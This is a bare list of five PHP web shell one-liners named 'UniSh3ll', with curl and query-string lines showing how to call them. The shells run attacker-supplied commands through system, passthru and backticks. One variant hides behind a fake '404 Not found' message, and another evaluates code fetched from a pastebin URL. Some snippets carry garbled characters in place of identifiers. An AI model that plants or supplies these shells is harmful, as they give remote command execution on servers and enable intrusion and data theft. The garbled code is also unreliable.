UniSh3ll-I
1
|
<?=$_=$_GET;$_[_]($_[0]); //.php?_=system&0=id;ls+-la
|
UniSh3ll-II
1
|
echo -e "<?=\`\$_REQUEST[_]\`?>" > unish3ll.php
|
1
|
echo -e "<?=\`\$_REQUEST[_]\`?>\r<?='404 Not found';?>" > unish3ll.php
|
áááááááážá curl localhost/unish3ll.php -d _=ls+-la
UniSh3ll-III
1
|
<?=$á=$_GET;if($á[á]!=null)$á[á]==áááśá&$á[á]($á[á]); //.php?á=true&á=áááśá&á=passthru&á=ls
|
1
|
<?=$á=$_GET;if($á[á]!=null)$á[á]==áááśá&$á[á]($á[á]); eval('?>'.file_get_contents($á[á]));?>
|
áááááááážá unish3ll.php?á=true&á=áááśá&á=passthru&á=id&á=https://pastebin.com/raw/xxxxx
UniSh3ll-IV
1
|
<?=$a="sy";$b="stem";$c=$a.$b; $c("uname -a"); //get method
|
UniSh3ll-V
1
|
<?=$_[]=@(($á=@$_REQUEST).($đ=@$á[0]).($đ($á[1]))); //curl -v '127.0.0.1:8080/unish3ll.php?0=system&1=la+-la'
|